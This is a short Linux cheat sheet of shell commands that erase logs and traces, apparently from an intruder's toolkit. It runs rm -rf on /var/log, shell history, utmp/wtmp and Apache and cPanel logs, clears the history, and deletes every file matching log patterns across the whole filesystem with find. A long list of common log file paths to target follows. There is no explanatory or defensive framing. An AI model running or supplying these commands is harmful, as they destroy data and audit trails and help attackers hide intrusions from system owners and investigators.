===[Log|Linux]===
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
rm .bash_history
rm /etc/httpd/logs/*
rm /usr/local/cpanel/logs/*
________________________________________________
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log.1
/etc/httpd/logs/access_log.2
/etc/httpd/logs/access_log.3
/etc/httpd/logs/access_log.4
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log.1
/etc/httpd/logs/error_log.2
/etc/httpd/logs/error_log.3
/etc/httpd/logs/error_log.4
/usr/local/apache/logs/error_log
/usr/local/apache/logs/suexec_log
/etc/httpd/logs/modsec_audit.log
/etc/httpd/logs/modsec_debug.log
/var/log/httpd/error_log
/var/log/apache2/error.log
/var/log/httpd-error.log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/var/log/auth.log
/var/log/kern.log
/var/log/cron.log
/var/log/boot.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/log/Xorg.0.log
/var/log/wvdialconf.log
/var/log/user.log
/var/log/pycentral.log
/var/log/mail.log
/var/log/apport.log
/var/log/auth.log
/var/bootstrap.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/fontconfig.log
/var/log/lpr.log
/var/log/chkservd.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/maillog
/var/log/messages
/usr/local/apache/domlogs/ftpxferlog
/var/log/xferlog
/var/log/nctfpd.errs
/var/log/httpsd/ssl.access_log
/var/log/ncftpd/misclog.txt
/var/log/nctfpd.errs